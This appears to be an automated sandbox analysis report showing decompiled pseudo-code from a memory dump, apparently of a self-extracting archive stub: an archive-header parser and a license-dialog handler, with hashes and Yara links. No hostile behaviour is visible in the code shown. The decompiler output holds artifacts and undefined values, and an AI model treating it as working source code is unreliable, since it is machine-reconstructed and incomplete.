                                                                                                                                                    • Opcode Fuzzy Hash: 6223c04811c1f564a5e428c6b02f3d43eac18fa2cd4be7a5d1a55c06b7ce4fd6
                                                                                                                                                    • Instruction Fuzzy Hash: 7511C5B6221109BFCF15EF94C840CED3BA5FF94250B4546A1FA188F235DA32EE509B84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0121214E, Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E0121214E(intOrPtr __ecx) {
				signed int _t135;
				void* _t137;
				signed int _t139;
				unsigned int _t140;
				signed int _t144;
				signed int _t161;
				signed int _t164;
				void* _t167;
				void* _t172;
				signed int _t175;
				signed char _t178;
				signed char _t179;
				signed char _t180;
				signed int _t182;
				signed int _t185;
				signed int _t187;
				signed int _t188;
				signed char _t220;
				signed char _t232;
				signed int _t233;
				signed int _t236;
				intOrPtr _t240;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				signed int _t257;
				signed int _t258;
				signed char _t262;
				signed int _t263;
				signed int _t265;
				intOrPtr _t272;
				intOrPtr _t275;
				intOrPtr _t278;
				intOrPtr _t314;
				signed int _t315;
				intOrPtr _t318;
				signed int _t322;
				void* _t323;
				void* _t324;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr* _t336;
				signed int _t339;
				void* _t340;
				signed int _t341;
				char* _t342;
				void* _t343;
				void* _t344;
				signed int _t348;
				signed int _t351;
				signed int _t366;

				E0122E1C0();
				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
				_t314 =  *((intOrPtr*)(_t318 + 0x18));
				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
				if(_t135 <  *(_t318 + 0x1c)) {
					L104:
					return _t135;
				}
				_t315 = _t314 - _t135;
				 *(_t318 + 0x1c) = _t135;
				if(_t315 >= 2) {
					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
					while(1) {
						_t135 = E0121C620(_t315);
						_t244 = _t135;
						_t348 = _t315;
						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
							break;
						}
						_t322 =  *(_t318 + 0x1c);
						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
						if(_t135 == 0) {
							break;
						}
						_t351 = _t315;
						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
							break;
						} else {
							_t339 = _t322 + _t244;
							 *(_t344 + 0x28) = _t339;
							_t137 = E0121C620(_t315);
							_t340 = _t339 -  *(_t318 + 0x1c);
							_t323 = _t137;
							_t135 = _t315;
							_t246 = 0;
							 *(_t344 + 0x24) = _t135;
							 *(_t344 + 0x20) = 0;
							if(0 < 0 || 0 <= 0 && _t340 < 0) {
								break;
							} else {
								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
									 *((char*)(_t240 + 0x1e)) = 1;
									_t232 = E0121C620(_t315);
									 *(_t344 + 0x1c) = _t232;
									if((_t232 & 0x00000001) != 0) {
										_t236 = E0121C620(_t315);
										if((_t236 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
										_t232 =  *(_t344 + 0x1c);
									}
									if((_t232 & 0x00000002) != 0) {
										_t233 = E0121C620(_t315);
										if((_t233 | _t315) != 0) {
											asm("adc eax, edx");
											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
										}
									}
									_t246 =  *(_t344 + 0x20);
									_t135 =  *(_t344 + 0x24);
								}
								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
									_t366 = _t135;
									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
										goto L102;
									} else {
										_t324 = _t323 - 1;
										if(_t324 == 0) {
											_t139 = E0121C620(_t315);
											__eflags = _t139;
											if(_t139 == 0) {
												_t140 = E0121C620(_t315);
												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
												_t144 = E0121C4D3(_t318) & 0x000000ff;
												 *(_t240 + 0x10ec) = _t144;
												__eflags = _t144 - 0x18;
												if(_t144 > 0x18) {
													E01213FD6(_t344 + 0x38, 0x14, L"xc%u", _t144);
													_t257 =  *(_t344 + 0x28);
													_t167 = _t344 + 0x40;
													_t344 = _t344 + 0x10;
													E01213F81(_t257, _t240 + 0x28, _t167);
												}
												E0121C582(_t318, _t240 + 0x10a1, 0x10);
												E0121C582(_t318, _t240 + 0x10b1, 0x10);
												__eflags =  *(_t240 + 0x10c1);
												if( *(_t240 + 0x10c1) != 0) {
													_t325 = _t240 + 0x10c2;
													E0121C582(_t318, _t240 + 0x10c2, 8);
													E0121C582(_t318, _t344 + 0x30, 4);
													E0121F807(_t344 + 0x58);
													E0121F84D(_t344 + 0x60, _t240 + 0x10c2, 8);
													_push(_t344 + 0x30);
													E0121F716(_t344 + 0x5c);
													_t161 = E0122FC4A(_t344 + 0x34, _t344 + 0x34, 4);
													_t344 = _t344 + 0xc;
													asm("sbb al, al");
													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
													 *(_t240 + 0x10c1) =  ~_t161 + 1;
													if( *((intOrPtr*)(_t240 + 4)) == 3) {
														_t164 = E0122FC4A(_t325, 0x1242668, 8);
														_t344 = _t344 + 0xc;
														__eflags = _t164;
														if(_t164 == 0) {
															 *(_t240 + 0x10c1) = _t164;
														}
													}
												}
												 *((char*)(_t240 + 0x10a0)) = 1;
												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
												 *((char*)(_t240 + 0x109b)) = 1;
											} else {
												E01213FD6(_t344 + 0x38, 0x14, L"x%u", _t139);
												_t258 =  *(_t344 + 0x28);
												_t172 = _t344 + 0x40;
												_t344 = _t344 + 0x10;
												E01213F81(_t258, _t240 + 0x28, _t172);
											}
											goto L102;
										}
										_t326 = _t324 - 1;
										if(_t326 == 0) {
											_t175 = E0121C620(_t315);
											__eflags = _t175;
											if(_t175 != 0) {
												goto L102;
											}
											_push(0x20);
											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
											_push(_t240 + 0x1074);
											L40:
											E0121C582(_t318);
											goto L102;
										}
										_t327 = _t326 - 1;
										if(_t327 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L65:
												_t178 = E0121C620(_t315);
												 *(_t344 + 0x13) = _t178;
												_t179 = _t178 & 0x00000001;
												_t262 =  *(_t344 + 0x13);
												 *(_t344 + 0x14) = _t179;
												_t315 = _t262 & 0x00000002;
												__eflags = _t315;
												 *(_t344 + 0x15) = _t315;
												if(_t315 != 0) {
													_t278 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E01220D5C(_t240 + 0x1040, _t315, E0121C562(_t278, __eflags), _t315);
													} else {
														E01220D1D(_t240 + 0x1040, _t315, E0121C520(_t278), 0);
													}
													_t262 =  *(_t344 + 0x13);
													_t179 =  *(_t344 + 0x14);
												}
												_t263 = _t262 & 0x00000004;
												__eflags = _t263;
												 *(_t344 + 0x16) = _t263;
												if(_t263 != 0) {
													_t275 = _t318;
													__eflags = _t179;
													if(__eflags == 0) {
														E01220D5C(_t240 + 0x1048, _t315, E0121C562(_t275, __eflags), _t315);
													} else {
														E01220D1D(_t240 + 0x1048, _t315, E0121C520(_t275), 0);
													}
												}
												_t180 =  *(_t344 + 0x13);
												_t265 = _t180 & 0x00000008;
												__eflags = _t265;
												 *(_t344 + 0x17) = _t265;
												if(_t265 != 0) {
													__eflags =  *(_t344 + 0x14);
													_t272 = _t318;
													if(__eflags == 0) {
														E01220D5C(_t240 + 0x1050, _t315, E0121C562(_t272, __eflags), _t315);
													} else {
														E01220D1D(_t240 + 0x1050, _t315, E0121C520(_t272), 0);
													}
													_t180 =  *(_t344 + 0x13);
												}
												__eflags =  *(_t344 + 0x14);
												if( *(_t344 + 0x14) != 0) {
													__eflags = _t180 & 0x00000010;
													if((_t180 & 0x00000010) != 0) {
														__eflags =  *(_t344 + 0x15);
														if( *(_t344 + 0x15) == 0) {
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
														} else {
															_t187 = E0121C520(_t318);
															_t341 = 0x3fffffff;
															_t328 = 0x3b9aca00;
															_t188 = _t187 & 0x3fffffff;
															__eflags = _t188 - 0x3b9aca00;
															if(_t188 < 0x3b9aca00) {
																E012209DA(_t240 + 0x1040, _t188, 0);
															}
														}
														__eflags =  *(_t344 + 0x16);
														if( *(_t344 + 0x16) != 0) {
															_t185 = E0121C520(_t318) & _t341;
															__eflags = _t185 - _t328;
															if(_t185 < _t328) {
																E012209DA(_t240 + 0x1048, _t185, 0);
															}
														}
														__eflags =  *(_t344 + 0x17);
														if( *(_t344 + 0x17) != 0) {
															_t182 = E0121C520(_t318) & _t341;
															__eflags = _t182 - _t328;
															if(_t182 < _t328) {
																E012209DA(_t240 + 0x1050, _t182, 0);
															}
														}
													}
												}
												goto L102;
											}
											__eflags = _t340 - 5;
											if(_t340 < 5) {
												goto L102;
											}
											goto L65;
										}
										_t329 = _t327 - 1;
										if(_t329 == 0) {
											__eflags = _t246;
											if(__eflags < 0) {
												goto L102;
											}
											if(__eflags > 0) {
												L60:
												E0121C620(_t315);
												__eflags = E0121C620(_t315);
												if(__eflags != 0) {
													 *((char*)(_t240 + 0x10f3)) = 1;
													E01213FD6(_t344 + 0x38, 0x14, L";%u", _t203);
													_t344 = _t344 + 0x10;
													E0121FD6E(__eflags, _t240 + 0x28, _t344 + 0x30, 0x800);
												}
												goto L102;
											}
											__eflags = _t340 - 1;
											if(_t340 < 1) {
												goto L102;
											}
											goto L60;
										}
										_t330 = _t329 - 1;
										if(_t330 == 0) {
											 *((intOrPtr*)(_t240 + 0x1100)) = E0121C620(_t315);
											 *(_t240 + 0x2104) = E0121C620(_t315) & 0x00000001;
											_t331 = E0121C620(_t315);
											 *((char*)(_t344 + 0xc0)) = 0;
											__eflags = _t331 - 0x1fff;
											if(_t331 < 0x1fff) {
												E0121C582(_t318, _t344 + 0xc4, _t331);
												 *((char*)(_t344 + _t331 + 0xc0)) = 0;
											}
											E0121BC60(_t344 + 0xc4, _t344 + 0xc4, 0x2000);
											_push(0x800);
											_push(_t240 + 0x1104);
											_push(_t344 + 0xc8);
											E0122138C();
											goto L102;
										}
										_t332 = _t330 - 1;
										if(_t332 == 0) {
											_t220 = E0121C620(_t315);
											 *(_t344 + 0x1c) = _t220;
											_t342 = _t240 + 0x2108;
											 *(_t240 + 0x2106) = _t220 >> 0x00000002 & 0x00000001;
											 *(_t240 + 0x2107) = _t220 >> 0x00000003 & 0x00000001;
											 *((char*)(_t240 + 0x2208)) = 0;
											 *_t342 = 0;
											__eflags = _t220 & 0x00000001;
											if((_t220 & 0x00000001) != 0) {
												_t334 = E0121C620(_t315);
												__eflags = _t334 - 0xff;
												if(_t334 >= 0xff) {
													_t334 = 0xff;
												}
												E0121C582(_t318, _t342, _t334);
												_t220 =  *(_t344 + 0x1c);
												 *((char*)(_t334 + _t342)) = 0;
											}
											__eflags = _t220 & 0x00000002;
											if((_t220 & 0x00000002) != 0) {
												_t333 = E0121C620(_t315);
												__eflags = _t333 - 0xff;
												if(_t333 >= 0xff) {
													_t333 = 0xff;
												}
												_t343 = _t240 + 0x2208;
												E0121C582(_t318, _t343, _t333);
												 *((char*)(_t333 + _t343)) = 0;
											}
											__eflags =  *(_t240 + 0x2106);
											if( *(_t240 + 0x2106) != 0) {
												 *((intOrPtr*)(_t240 + 0x2308)) = E0121C620(_t315);
											}
											__eflags =  *(_t240 + 0x2107);
											if( *(_t240 + 0x2107) != 0) {
												 *((intOrPtr*)(_t240 + 0x230c)) = E0121C620(_t315);
											}
											 *((char*)(_t240 + 0x2105)) = 1;
											goto L102;
										}
										if(_t332 != 1) {
											goto L102;
										}
										if( *((intOrPtr*)(_t240 + 4)) == 3 &&  *((intOrPtr*)(_t318 + 0x18)) -  *(_t344 + 0x28) == 1) {
											_t340 = _t340 + 1;
										}
										_t336 = _t240 + 0x1028;
										E01212020(_t336, _t340);
										_push(_t340);
										_push( *_t336);
										goto L40;
									}
								} else {
									L102:
									_t247 =  *(_t344 + 0x28);
									 *(_t318 + 0x1c) = _t247;
									_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t247;
									if(_t135 >= 2) {
										continue;
									}
									break;
								}
							}
						}
					}
				}
			}





























































                                                                                                                                                    0x01212153
                                                                                                                                                    0x01212159
                                                                                                                                                    0x01212160
                                                                                                                                                    0x01212164
                                                                                                                                                    0x01212169
                                                                                                                                                    0x01212173
                                                                                                                                                    0x012127ca
                                                                                                                                                    0x012127d1
                                                                                                                                                    0x012127d1
                                                                                                                                                    0x01212179
                                                                                                                                                    0x0121217b
                                                                                                                                                    0x01212181
                                                                                                                                                    0x01212188
                                                                                                                                                    0x01212191
                                                                                                                                                    0x01212193
                                                                                                                                                    0x01212198
                                                                                                                                                    0x0121219a
                                                                                                                                                    0x0121219c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012121af
                                                                                                                                                    0x012121b2
                                                                                                                                                    0x012121b4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012121ba
                                                                                                                                                    0x012121bc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012121cc
                                                                                                                                                    0x012121cc
                                                                                                                                                    0x012121d1
                                                                                                                                                    0x012121d5
                                                                                                                                                    0x012121da
                                                                                                                                                    0x012121dd
                                                                                                                                                    0x012121df
                                                                                                                                                    0x012121e1
                                                                                                                                                    0x012121e3
                                                                                                                                                    0x012121e7
                                                                                                                                                    0x012121eb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012121fb
                                                                                                                                                    0x012121ff
                                                                                                                                                    0x01212210
                                                                                                                                                    0x01212214
                                                                                                                                                    0x01212219
                                                                                                                                                    0x0121221f
                                                                                                                                                    0x01212223
                                                                                                                                                    0x0121222c
                                                                                                                                                    0x01212244
                                                                                                                                                    0x01212246
                                                                                                                                                    0x01212249
                                                                                                                                                    0x01212249
                                                                                                                                                    0x0121224c
                                                                                                                                                    0x0121224c
                                                                                                                                                    0x01212252
                                                                                                                                                    0x01212256
                                                                                                                                                    0x0121225f
                                                                                                                                                    0x01212277
                                                                                                                                                    0x01212279
                                                                                                                                                    0x0121227c
                                                                                                                                                    0x0121227c
                                                                                                                                                    0x0121225f
                                                                                                                                                    0x0121227f
                                                                                                                                                    0x01212283
                                                                                                                                                    0x01212283
                                                                                                                                                    0x0121228b
                                                                                                                                                    0x01212297
                                                                                                                                                    0x01212299
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012122aa
                                                                                                                                                    0x012122aa
                                                                                                                                                    0x012122ad
                                                                                                                                                    0x0121265c
                                                                                                                                                    0x01212661
                                                                                                                                                    0x01212663
                                                                                                                                                    0x01212693
                                                                                                                                                    0x012126a1
                                                                                                                                                    0x012126a9
                                                                                                                                                    0x012126b4
                                                                                                                                                    0x012126b7
                                                                                                                                                    0x012126bd
                                                                                                                                                    0x012126c0
                                                                                                                                                    0x012126cf
                                                                                                                                                    0x012126d4
                                                                                                                                                    0x012126d8
                                                                                                                                                    0x012126dc
                                                                                                                                                    0x012126e4
                                                                                                                                                    0x012126e4
                                                                                                                                                    0x012126f4
                                                                                                                                                    0x01212704
                                                                                                                                                    0x01212709
                                                                                                                                                    0x01212710
                                                                                                                                                    0x01212718
                                                                                                                                                    0x01212721
                                                                                                                                                    0x0121272f
                                                                                                                                                    0x01212739
                                                                                                                                                    0x01212746
                                                                                                                                                    0x0121274f
                                                                                                                                                    0x01212755
                                                                                                                                                    0x01212766
                                                                                                                                                    0x0121276b
                                                                                                                                                    0x01212770
                                                                                                                                                    0x01212774
                                                                                                                                                    0x01212778
                                                                                                                                                    0x0121277e
                                                                                                                                                    0x01212788
                                                                                                                                                    0x0121278d
                                                                                                                                                    0x01212790
                                                                                                                                                    0x01212792
                                                                                                                                                    0x01212794
                                                                                                                                                    0x01212794
                                                                                                                                                    0x01212792
                                                                                                                                                    0x0121277e
                                                                                                                                                    0x0121279a
                                                                                                                                                    0x012127a1
                                                                                                                                                    0x012127ab
                                                                                                                                                    0x01212665
                                                                                                                                                    0x01212672
                                                                                                                                                    0x01212677
                                                                                                                                                    0x0121267b
                                                                                                                                                    0x0121267f
                                                                                                                                                    0x01212687
                                                                                                                                                    0x01212687
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01212663
                                                                                                                                                    0x012122b3
                                                                                                                                                    0x012122b6
                                                                                                                                                    0x01212635
                                                                                                                                                    0x0121263a
                                                                                                                                                    0x0121263c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01212642
                                                                                                                                                    0x0121264a
                                                                                                                                                    0x01212654
                                                                                                                                                    0x0121230b
                                                                                                                                                    0x0121230d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121230d
                                                                                                                                                    0x012122bc
                                                                                                                                                    0x012122bf
                                                                                                                                                    0x012124b6
                                                                                                                                                    0x012124b8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012124be
                                                                                                                                                    0x012124c9
                                                                                                                                                    0x012124cb
                                                                                                                                                    0x012124d0
                                                                                                                                                    0x012124d4
                                                                                                                                                    0x012124d6
                                                                                                                                                    0x012124dc
                                                                                                                                                    0x012124e0
                                                                                                                                                    0x012124e0
                                                                                                                                                    0x012124e3
                                                                                                                                                    0x012124e7
                                                                                                                                                    0x012124e9
                                                                                                                                                    0x012124eb
                                                                                                                                                    0x012124ed
                                                                                                                                                    0x01212511
                                                                                                                                                    0x012124ef
                                                                                                                                                    0x012124fd
                                                                                                                                                    0x012124fd
                                                                                                                                                    0x01212516
                                                                                                                                                    0x0121251a
                                                                                                                                                    0x0121251a
                                                                                                                                                    0x0121251e
                                                                                                                                                    0x0121251e
                                                                                                                                                    0x01212521
                                                                                                                                                    0x01212525
                                                                                                                                                    0x01212527
                                                                                                                                                    0x01212529
                                                                                                                                                    0x0121252b
                                                                                                                                                    0x0121254f
                                                                                                                                                    0x0121252d
                                                                                                                                                    0x0121253b
                                                                                                                                                    0x0121253b
                                                                                                                                                    0x0121252b
                                                                                                                                                    0x01212554
                                                                                                                                                    0x0121255a
                                                                                                                                                    0x0121255a
                                                                                                                                                    0x0121255d
                                                                                                                                                    0x01212561
                                                                                                                                                    0x01212563
                                                                                                                                                    0x01212568
                                                                                                                                                    0x0121256a
                                                                                                                                                    0x0121258e
                                                                                                                                                    0x0121256c
                                                                                                                                                    0x0121257a
                                                                                                                                                    0x0121257a
                                                                                                                                                    0x01212593
                                                                                                                                                    0x01212593
                                                                                                                                                    0x01212597
                                                                                                                                                    0x0121259c
                                                                                                                                                    0x012125a2
                                                                                                                                                    0x012125a4
                                                                                                                                                    0x012125aa
                                                                                                                                                    0x012125af
                                                                                                                                                    0x012125d8
                                                                                                                                                    0x012125dd
                                                                                                                                                    0x012125b1
                                                                                                                                                    0x012125b3
                                                                                                                                                    0x012125b8
                                                                                                                                                    0x012125bd
                                                                                                                                                    0x012125c2
                                                                                                                                                    0x012125c4
                                                                                                                                                    0x012125c6
                                                                                                                                                    0x012125d1
                                                                                                                                                    0x012125d1
                                                                                                                                                    0x012125c6
                                                                                                                                                    0x012125e2
                                                                                                                                                    0x012125e7
                                                                                                                                                    0x012125f0
                                                                                                                                                    0x012125f2
                                                                                                                                                    0x012125f4
                                                                                                                                                    0x012125ff
                                                                                                                                                    0x012125ff
                                                                                                                                                    0x012125f4
                                                                                                                                                    0x01212604
                                                                                                                                                    0x01212609
                                                                                                                                                    0x01212616
                                                                                                                                                    0x01212618
                                                                                                                                                    0x0121261a
                                                                                                                                                    0x01212629
                                                                                                                                                    0x01212629
                                                                                                                                                    0x0121261a
                                                                                                                                                    0x01212609
                                                                                                                                                    0x012125a4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121259c
                                                                                                                                                    0x012124c0
                                                                                                                                                    0x012124c3
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012124c3
                                                                                                                                                    0x012122c5
                                                                                                                                                    0x012122c8
                                                                                                                                                    0x01212459
                                                                                                                                                    0x0121245b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01212461
                                                                                                                                                    0x0121246c
                                                                                                                                                    0x0121246e
                                                                                                                                                    0x0121247a
                                                                                                                                                    0x0121247c
                                                                                                                                                    0x0121248c
                                                                                                                                                    0x01212496
                                                                                                                                                    0x0121249b
                                                                                                                                                    0x012124ac
                                                                                                                                                    0x012124ac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121247c
                                                                                                                                                    0x01212463
                                                                                                                                                    0x01212466
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01212466
                                                                                                                                                    0x012122ce
                                                                                                                                                    0x012122d1
                                                                                                                                                    0x012123e4
                                                                                                                                                    0x012123f3
                                                                                                                                                    0x012123fe
                                                                                                                                                    0x01212400
                                                                                                                                                    0x01212408
                                                                                                                                                    0x0121240e
                                                                                                                                                    0x0121241b
                                                                                                                                                    0x01212420
                                                                                                                                                    0x01212420
                                                                                                                                                    0x01212436
                                                                                                                                                    0x0121243b
                                                                                                                                                    0x01212446
                                                                                                                                                    0x0121244e
                                                                                                                                                    0x0121244f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0121244f
                                                                                                                                                    0x012122d7
                                                                                                                                                    0x012122da
                                                                                                                                                    0x01212319
                                                                                                                                                    0x01212320
                                                                                                                                                    0x01212327
                                                                                                                                                    0x01212330
                                                                                                                                                    0x0121233e
                                                                                                                                                    0x01212344
                                                                                                                                                    0x0121234b
                                                                                                                                                    0x0121234f
                                                                                                                                                    0x01212351
                                                                                                                                                    0x0121235a
                                                                                                                                                    0x01212361
                                                                                                                                                    0x01212363
                                                                                                                                                    0x01212365
                                                                                                                                                    0x01212365
                                                                                                                                                    0x0121236b
                                                                                                                                                    0x01212370
                                                                                                                                                    0x01212374
                                                                                                                                                    0x01212374
                                                                                                                                                    0x01212378
                                                                                                                                                    0x0121237a
                                                                                                                                                    0x01212383
                                                                                                                                                    0x0121238a
                                                                                                                                                    0x0121238c
                                                                                                                                                    0x0121238e
                                                                                                                                                    0x0121238e
                                                                                                                                                    0x01212391
                                                                                                                                                    0x0121239a
                                                                                                                                                    0x0121239f
                                                                                                                                                    0x0121239f
                                                                                                                                                    0x012123a3
                                                                                                                                                    0x012123aa
                                                                                                                                                    0x012123b3
                                                                                                                                                    0x012123b3
                                                                                                                                                    0x012123b9
                                                                                                                                                    0x012123c0
                                                                                                                                                    0x012123c9
                                                                                                                                                    0x012123c9
                                                                                                                                                    0x012123cf
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012123cf
                                                                                                                                                    0x012122df
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012122e9
                                                                                                                                                    0x012122f7
                                                                                                                                                    0x012122f7
                                                                                                                                                    0x012122fa
                                                                                                                                                    0x01212303
                                                                                                                                                    0x01212308
                                                                                                                                                    0x01212309
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01212309
                                                                                                                                                    0x012127b2
                                                                                                                                                    0x012127b2
                                                                                                                                                    0x012127b2
                                                                                                                                                    0x012127b6
                                                                                                                                                    0x012127bc
                                                                                                                                                    0x012127c1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012127c1
                                                                                                                                                    0x0121228b
                                                                                                                                                    0x012121eb
                                                                                                                                                    0x012121bc
                                                                                                                                                    0x012127c9

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ;%u$x%u$xc%u
                                                                                                                                                    • API String ID: 0-2277559157
                                                                                                                                                    • Opcode ID: 460027199364e6e83fd50ca3400b688a7b94d790991877e70a8172abc324af81
                                                                                                                                                    • Instruction ID: c881ab2d6926fdf38e613c36a7fd3497883f41ee55b0d9fece8404e45f7fec36
                                                                                                                                                    • Opcode Fuzzy Hash: 460027199364e6e83fd50ca3400b688a7b94d790991877e70a8172abc324af81
                                                                                                                                                    • Instruction Fuzzy Hash: 34F12D70624342DBDB19DF2888947FF7BD9AFB0300F180569FE869B24ED7609545C761
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122AC20, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                    			E0122AC20(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E0121130B(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E0122CBAE(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0x125b574;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0x1265b74;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0x126dc8c;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0x12710c0(0xf));
					 *0x12710bc(_t34);
					_t30 =  *0x125745c; // 0x0
					E012295B5(_t30, __eflags,  *0x124fed4, _t37,  *0x126dc88, 0, 0);
					L0123340E( *0x126dc8c);
					L0123340E( *0x126dc88);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					EndDialog(_t34, ??);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}














                                                                                                                                                    0x0122ac20
                                                                                                                                                    0x0122ac21
                                                                                                                                                    0x0122ac27
                                                                                                                                                    0x0122ac2e
                                                                                                                                                    0x0122ac47
                                                                                                                                                    0x0122ad33
                                                                                                                                                    0x0122ad35
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ad35
                                                                                                                                                    0x0122ac4d
                                                                                                                                                    0x0122ac53
                                                                                                                                                    0x0122ac80
                                                                                                                                                    0x0122ac85
                                                                                                                                                    0x0122ac8a
                                                                                                                                                    0x0122ac8c
                                                                                                                                                    0x0122ac97
                                                                                                                                                    0x0122ac97
                                                                                                                                                    0x0122ac9d
                                                                                                                                                    0x0122aca2
                                                                                                                                                    0x0122aca4
                                                                                                                                                    0x0122acb0
                                                                                                                                                    0x0122acb0
                                                                                                                                                    0x0122acb6
                                                                                                                                                    0x0122acbb
                                                                                                                                                    0x0122acbd
                                                                                                                                                    0x0122acc1
                                                                                                                                                    0x0122acc1
                                                                                                                                                    0x0122acd6
                                                                                                                                                    0x0122acde
                                                                                                                                                    0x0122acf4
                                                                                                                                                    0x0122acfb
                                                                                                                                                    0x0122ad01
                                                                                                                                                    0x0122ad16
                                                                                                                                                    0x0122ad21
                                                                                                                                                    0x0122ad2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ad32
                                                                                                                                                    0x0122ac58
                                                                                                                                                    0x0122ac67
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122ac67
                                                                                                                                                    0x0122ac5d
                                                                                                                                                    0x0122ac60
                                                                                                                                                    0x0122ac7b
                                                                                                                                                    0x0122ac6f
                                                                                                                                                    0x0122ac70
                                                                                                                                                    0x00000000
